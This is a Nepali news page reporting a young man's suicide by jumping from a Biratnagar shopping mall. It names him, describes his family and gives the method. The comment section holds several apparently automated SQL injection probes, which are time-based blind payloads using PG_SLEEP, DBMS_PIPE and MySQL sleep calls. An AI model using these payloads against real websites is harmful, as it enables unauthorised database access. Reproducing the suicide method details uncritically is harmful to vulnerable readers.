मुख्य समाचार
कञ्चनरूपमा पहिलोपटक राधाकृष्ण रथयात्रा, भक्तिको रंगमा रंगियो नगर | बसबाट ओर्लिँदै गर्दा लडेकी निर्मलाको उपचारकै क्रममा मृत्यु | कञ्चनरूपमा आज पहिलोपटक राधाकृष्णको ऐतिहासिक रथयात्रा निकालिँदै | सुरुङभित्र फसेका सप्तरीका इन्जिनियर सञ्जय साहलाई जीवितै उद्धार | युग बदलियो, प्रश्न उस्तै छन् : विगतको मर्यादा र आजको कृष्ण–चेतना | कोशीब्यारेजमा २ लाख २९ हजार क्युसेक पानी , खतराको तह पार | तीन महिनापछि पक्राउ परे जबर्जस्ती करणी आरोपित | कोशी ब्यारेजमा पानीको प्रवाह २ लाख १० हजार क्युसेक नाघ्यो | बाढी रसुवामा आयो, रात निदाउन छाड्यो सप्तरीले | कञ्चनरूपको ७९ करोड ८७ लाखको बजेट , शिक्षा–स्वास्थ्यदेखि पूर्वाधारसम्म प्राथमिकता |

विराटनगरमा फेरी एक जनाले गरे आत्महत्या

Kanchan24 1+ समाचार ( )
२ जेठ २०८०, मङ्गलबार

विराटनगर, २ जेठ । विराटनगरमा एक जनाले आत्महत्या गरेका छन् । विराटनगरस्थित कोचाखालका २३ बर्षि मुकुन्द काफ्लेले सेन्ट्रलमलबाट हामफालेर आत्महत्या गरेका हुन् ।

बैशाख ३१ गते साँझ साढे ७ सात बजेको समयमा विराटनगर मेनरोडस्थित सेन्ट्रलमलको ३ तल्लाबाट हामफालेर काफ्लेले आत्महत्या गरेको हुन् ।  सेन्ट्रलमलबाट हामफालेका काफ्ले गम्भिर घाइते भएका थिए । उनको विराटनगर स्थित कोशी अस्पतालमा उपचारको क्रममासोमबार राती निधन भएको हो ।

मंगलबार कोशी अस्पतालमा पोष्टमाटम गरिसकेपछि काफ्लेको विराटनगर स्थित सिंघिया नदीमा अन्तेष्टि गरिएको छ । विराटनगर–५ कोचाखालका २३ बर्षिय अविवाहित मुकुन्द काफ्ले घरका तीन दाजुभाई मध्ये कान्छो छोरा हुन् । एक बर्षअघि मुकुन्दका बुवा प्रकाश काफ्लेको हृदयघातका कारण निधन भएको थियो ।

जिल्ला प्रहरी कार्यालय मोरङका प्रमुख प्रहरी उपरिक्षक दीपक पोखरेलले विराटनगरको सेन्ट्रलमलबाट हामफालेर आत्महत्या गरेका मुकुन्द काफ्लेको मंगलबार कोशी अस्पतालमा पोष्टमाटम पछि परिवारलाई शव जिम्मा लगाएइएको जानकारी दिए । 

प्रतिक्रिया

nEcdyGgxGwhgVX55') OR 541=(SELECT 541 FROM PG_SLEEP(15))-- १३ जेठ २०८३, बुधवार

555

nEcdyGgx9aBECvG9')) OR 673=(SELECT 673 FROM PG_SLEEP(15))-- १३ जेठ २०८३, बुधवार

555

nEcdyGgx'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' १३ जेठ २०८३, बुधवार

555

nEcdyGgx १३ जेठ २०८३, बुधवार

555

nEcdyGgx'" १३ जेठ २०८३, बुधवार

555

nEcdyGgx????%2527%2522\'\" १३ जेठ २०८३, बुधवार

555

@@wmVel १३ जेठ २०८३, बुधवार

555

nEcdyGgx0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z १३ जेठ २०८३, बुधवार

555

nEcdyGgx0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z १३ जेठ २०८३, बुधवार

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ १३ जेठ २०८३, बुधवार

555

ताजा समाचार

सबै

ट्रेन्डिङ

सबै

सम्बन्धित समाचार